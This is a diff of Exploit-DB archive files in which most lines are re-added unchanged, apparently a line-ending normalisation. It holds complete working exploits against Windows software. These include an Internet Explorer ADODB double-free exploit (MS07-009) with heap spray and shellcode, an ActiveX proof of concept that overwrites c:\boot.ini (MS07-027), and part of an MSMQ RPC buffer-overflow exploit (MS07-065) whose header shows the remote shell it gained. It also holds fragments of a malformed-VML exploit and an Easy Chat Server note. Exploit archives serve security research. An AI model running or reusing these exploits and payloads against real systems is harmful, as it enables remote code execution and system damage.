+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
+<v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
-lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
+lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
-fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
+fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/>
-<v/recolorinfo>
+<v/recolorinfo>
-</html>
+</html>
-BODY
+BODY
-open H,">$html" or die $! and exit;
+open H,">$html" or die $! and exit;
-print H $body;
+print H $body;
-
+
-# milw0rm.com [2007-01-17]
+# milw0rm.com [2007-01-17]
--- a/platforms/windows/remote/33326.py
+++ b/platforms/windows/remote/33326.py
@ -1,4 +1,6 @@
-## Exploit-DB Note: Must install to 'C:\Program Files\EFS Software\Easy Chat Server'
+## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
 ## For this specific exploit to work, easy chat must be installed to:
 ## 'C:\Program Files\EFS Software\Easy Chat Server'
 # Exploit Title: Easy Chat Server 3.1 stack buffer overflow
--- a/platforms/windows/remote/3577.html
+++ b/platforms/windows/remote/3577.html
@ -1,149 +1,149 @@
-<HTML>
+<HTML>
-<!--
+<!--
-**********************************************************************************
+**********************************************************************************
-Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
+Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009).
-**********************************************************************************
+**********************************************************************************
-Review:
+Review:
-This code exploit "double free error" in msado15.dll NextRecordset() function.
+This code exploit "double free error" in msado15.dll NextRecordset() function.
-As a result of double freeing of same string, rewriting of Heap Control Block 
+As a result of double freeing of same string, rewriting of Heap Control Block 
-by malicious data is occuring. 
+by malicious data is occuring. 
-Technique of exploitation is based on "Lookaside remapping".
+Technique of exploitation is based on "Lookaside remapping".
-Runs calc.exe if success.
+Runs calc.exe if success.
-->
+-->
-<HEAD>
+<HEAD>
-	<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
+	<OBJECT id=obj classid=clsid:00000535-0000-0010-8000-00AA006D2EA4></OBJECT>
-</HEAD>
+</HEAD>
-
+
-<BODY onLoad='Go()'>
+<BODY onLoad='Go()'>
-
+
-<script language=javascript>
+<script language=javascript>
-
+
-//------------------Replace with your code-----------------------//
+//------------------Replace with your code-----------------------//
-	var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+	var Shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
-//------------------Replace with your code-----------------------//
+//------------------Replace with your code-----------------------//
-
+
-
+
-//-------------Heap Repair Code. Do not Replace------------------//
+//-------------Heap Repair Code. Do not Replace------------------//
-		var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05%u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u8303%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E%u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u6642%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
+		var HeapRepairCode = unescape("%u9090%u9090%u186A%u645B%u038B%u408B%u8B30%u1840%u5805%u0001%u3300%u89D2%u8910%u0450%u5089%u8908%u0C50%uC083%u8928%u8900%u0440%uC083%u6608%u783D%u7C05%u8BF2%u81D8%u90C3%u0000%u8900%u3318%u83D2%u04C0%u1089%uC083%u8104%u80C3%u0000%u8900%u3318%u89C0%u8303%u04C3%u8166%u88FB%u7C1E%u8BF4%u81D3%u70EB%u001E%u6600%u338B%u8966%u4232%uC642%u0802%u6642%u328B%u3166%u4232%uC642%u1402%u6642%u328B%u3166%u4232%u6642%uC381%u0160%u1389%u5389%u8904%u891A%u045A%u9090");
-//-------------Heap Repair Code. Do not Replace------------------//
+//-------------Heap Repair Code. Do not Replace------------------//
-
+
-var part1 = '';
+var part1 = '';
-var part2 = '';
+var part2 = '';
-var partLen = 127;
+var partLen = 127;
-
+
-function PrepMem()
+function PrepMem()
-{
+{
-//Standard Heap Spray Code
+//Standard Heap Spray Code
-var heapSprayToAddress = 0x05050505;
+var heapSprayToAddress = 0x05050505;
-
+
-	var payLoadCode = HeapRepairCode + Shellcode;
+	var payLoadCode = HeapRepairCode + Shellcode;
-	var heapBlockSize = 0x400000;
+	var heapBlockSize = 0x400000;
-	var payLoadSize = payLoadCode.length * 2;
+	var payLoadSize = payLoadCode.length * 2;
-	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
+	var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
-	var spraySlide = unescape("%u9090%u9090");
+	var spraySlide = unescape("%u9090%u9090");
-	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
+	spraySlide = getSpraySlide(spraySlide,spraySlideSize);
-	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
+	heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
-	memory = new Array();
+	memory = new Array();
-
+
-	for (i=0;i<heapBlocks;i++)
+	for (i=0;i<heapBlocks;i++)
-	{
+	{
-		memory[i] = spraySlide + payLoadCode;
+		memory[i] = spraySlide + payLoadCode;
-	}
+	}
-
+
-	function getSpraySlide(spraySlide, spraySlideSize)
+	function getSpraySlide(spraySlide, spraySlideSize)
-	{
+	{
-		while (spraySlide.length*2<spraySlideSize)
+		while (spraySlide.length*2<spraySlideSize)
-		{
+		{
-			spraySlide += spraySlide;
+			spraySlide += spraySlide;
-		}
+		}
-		spraySlide = spraySlide.substring(0,spraySlideSize/2);
+		spraySlide = spraySlide.substring(0,spraySlideSize/2);
-		return spraySlide;
+		return spraySlide;
-	}
+	}
-}
+}
-
+
-
+
-function GetSystemVersion()
+function GetSystemVersion()
-{
+{
- //Simple Detecting of OS version out of Jscript version:
+ //Simple Detecting of OS version out of Jscript version:
-		
+		
-		var  ver = "";
+		var  ver = "";
-		ver += ScriptEngineMajorVersion();
+		ver += ScriptEngineMajorVersion();
-		ver += ScriptEngineMinorVersion();
+		ver += ScriptEngineMinorVersion();
-		ver += ScriptEngineBuildVersion();
+		ver += ScriptEngineBuildVersion();
-		
+		
-		if 	( ver<568820 ){ return("preSP2"); }
+		if 	( ver<568820 ){ return("preSP2"); }
-		else if ( ver<575730 ){ return("SP2"); }
+		else if ( ver<575730 ){ return("SP2"); }
-		else return (0);
+		else return (0);
-}
+}
-
+
-
+
-function PrepJmpcode(sp)
+function PrepJmpcode(sp)
-{
+{
-	switch(sp){
+	switch(sp){
-			case "preSP2":
+			case "preSP2":
-					
+					
-					var egg="";
+					var egg="";
-					egg+=unescape("%u0608%u0014");		
+					egg+=unescape("%u0608%u0014");		
-					egg+=unescape("%u0000%u0000");
+					egg+=unescape("%u0000%u0000");
-					egg+=unescape("%uF708%u0013");		
+					egg+=unescape("%uF708%u0013");		
-					egg+=unescape("%u0000%u0101");
+					egg+=unescape("%u0000%u0101");
-					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
-					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
-					
+					
-					part1+=unescape("%u0400%u0014");	
+					part1+=unescape("%u0400%u0014");	
-					part1+=unescape("%u320C%u77FC");	
+					part1+=unescape("%u320C%u77FC");	
-					while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode							
+					while (part1.length<partLen) {part1+=unescape("%u0505");}// ptr* shellcode							
-					
+					
-					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
+					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
-					part2+=egg;						
+					part2+=egg;						
-					
+					
-					break;	
+					break;	
-
+
-		
+		
-			case "SP2":
+			case "SP2":
-					
+					
-					var egg="";
+					var egg="";
-					egg+=unescape("%u0608%u0014");		
+					egg+=unescape("%u0608%u0014");		
-					egg+=unescape("%u0000%u0000");
+					egg+=unescape("%u0000%u0000");
-					egg+=unescape("%uF708%u0013");		
+					egg+=unescape("%uF708%u0013");		
-					egg+=unescape("%u0000%u0101");		
+					egg+=unescape("%u0000%u0101");		
-					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
-					egg+=unescape("%uFFFF%uFFFF");
+					egg+=unescape("%uFFFF%uFFFF");
-					
+					
-					part1+=unescape("%u0505%u0505");	
+					part1+=unescape("%u0505%u0505");	
-					part1+=unescape("%ue128%u75c7");	
+					part1+=unescape("%ue128%u75c7");	
-					while (part1.length<partLen) {part1+=unescape("%uFFFF");}								
+					while (part1.length<partLen) {part1+=unescape("%uFFFF");}								
-					
+					
-					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
+					while (part2.length<(partLen-egg.length)) {part2+=unescape("%uFFFF");}
-					part2+=egg;						
+					part2+=egg;						
-					
+					
-					break;	
+					break;	
-		}
+		}
-}
+}
-
+
-function Exploit()
+function Exploit()
-{
+{
-		var arr=new Array();
+		var arr=new Array();
-		var i=1;
+		var i=1;
-		
+		
-		while(i<500){
+		while(i<500){
-				try{
+				try{
-				k=1;
+				k=1;
-				while(k<500){ arr[k]=part1+part2; k++; }
+				while(k<500){ arr[k]=part1+part2; k++; }
-				obj.NextRecordset( part1+part2 );
+				obj.NextRecordset( part1+part2 );
-				}catch(e){}
+				}catch(e){}
-				i++;
+				i++;
-					}
+					}
-}
+}
-
+
-function Go(){
+function Go(){
-	PrepMem();
+	PrepMem();
-	PrepJmpcode( GetSystemVersion() );
+	PrepJmpcode( GetSystemVersion() );
-	Exploit();
+	Exploit();
-}
+}
-
+
-</script>
+</script>
-</body>
+</body>
-</html>
+</html>
-
+
-# milw0rm.com [2007-03-26]
+# milw0rm.com [2007-03-26]
--- a/platforms/windows/remote/3892.html
+++ b/platforms/windows/remote/3892.html
@ -1,20 +1,20 @@
-<html>
+<html>
-<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
+<title> MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification </title>
-<body>
+<body>
-
+
-<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 
+<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0"> 
-
+
-</OBJECT>
+</OBJECT>
-<script language="vbscript">
+<script language="vbscript">
-//next script is converted to UTF16
+//next script is converted to UTF16
- target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
+ target.SessionDescription="MS07-027 mdsauth.dll Proof of Concept exploit"
- target.SessionAuthor="Andres Tarasco Acuna"
+ target.SessionAuthor="Andres Tarasco Acuna"
- target.SessionEmailContact="atarasco_at_gmail.com"
+ target.SessionEmailContact="atarasco_at_gmail.com"
- target.SessionURL="http://www.514.es"
+ target.SessionURL="http://www.514.es"
- target.SaveAs "c:\boot.ini"
+ target.SaveAs "c:\boot.ini"
-</script>
+</script>
-
+
-</body>
+</body>
-</html>
+</html>
-
+
-# milw0rm.com [2007-05-10]
+# milw0rm.com [2007-05-10]
--- a/platforms/windows/remote/4616.pl
+++ b/platforms/windows/remote/4616.pl
--- a/platforms/windows/remote/4745.cpp
+++ b/platforms/windows/remote/4745.cpp
@ -1,355 +1,355 @@
-/*
+/*
-Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
+Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
-by axis
+by axis
-http://www.ph4nt0m.org
+http://www.ph4nt0m.org
- 
+ 
-  you should know the dnsname of target to trigger this vuln
+  you should know the dnsname of target to trigger this vuln
-  the service runs on port 2103/2105/2107
+  the service runs on port 2103/2105/2107
- 
+ 
-D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
+D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
--------------------------------------------------------------------------
+--------------------------------------------------------------------------
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
+-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
+-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
+-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
+-== Tested against Windows 2000 server SP4 ==-
--------------------------------------------------------------------------
+--------------------------------------------------------------------------
- 
+ 
-[+] Attacking default port 2103
+[+] Attacking default port 2103
-[*]Sending our Payload, Good Luck! ^_^
+[*]Sending our Payload, Good Luck! ^_^
-[*]Sending RPC Bind String!
+[*]Sending RPC Bind String!
-[*]Sending RPC Request Now!
+[*]Sending RPC Request Now!
- 
+ 
-D:\soft\develop\MyProjects\temp\Debug>
+D:\soft\develop\MyProjects\temp\Debug>
- 
+ 
- 
+ 
-D:\>nc -vv -n 192.168.152.100 1154
+D:\>nc -vv -n 192.168.152.100 1154
-(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
+(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket error
-Microsoft Windows 2000 [Version 5.00.2195]
+Microsoft Windows 2000 [Version 5.00.2195]
-(C) 版权所有 1985-2000 Microsoft Corp.
+(C) 版权所有 1985-2000 Microsoft Corp.
- 
+ 
-C:\WINNT\system32>exit
+C:\WINNT\system32>exit
-exit
+exit
-sent 5, rcvd 109: NOTSOCK
+sent 5, rcvd 109: NOTSOCK
- 
+ 
-D:\>
+D:\>
- 
+ 
- 
+ 
-*/
+*/
-#include <stdio.h>
+#include <stdio.h>
-#include <stdlib.h>
+#include <stdlib.h>
-#include <ctype.h>
+#include <ctype.h>
-#include <winsock.h>
+#include <winsock.h>
-#include <io.h>
+#include <io.h>
-#pragma comment(lib,"ws2_32")
+#pragma comment(lib,"ws2_32")
- 
+ 
-// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
+// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
-char bind_str[] = {
+char bind_str[] = {
-0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
+0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
-0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
+0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
-0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
+0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
+0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
-0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
+0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
-0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
+0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
- 
+ 
- 
+ 
-// RPC Request  Opnum: 0x06 
+// RPC Request  Opnum: 0x06 
-char request_1[] = {
+char request_1[] = {
-0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
+0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,
-0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
+0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,
-0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
+0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)
-0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
+0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,
-0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
+0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,
-0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
+0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,
-0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
+0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,
-0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
+0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
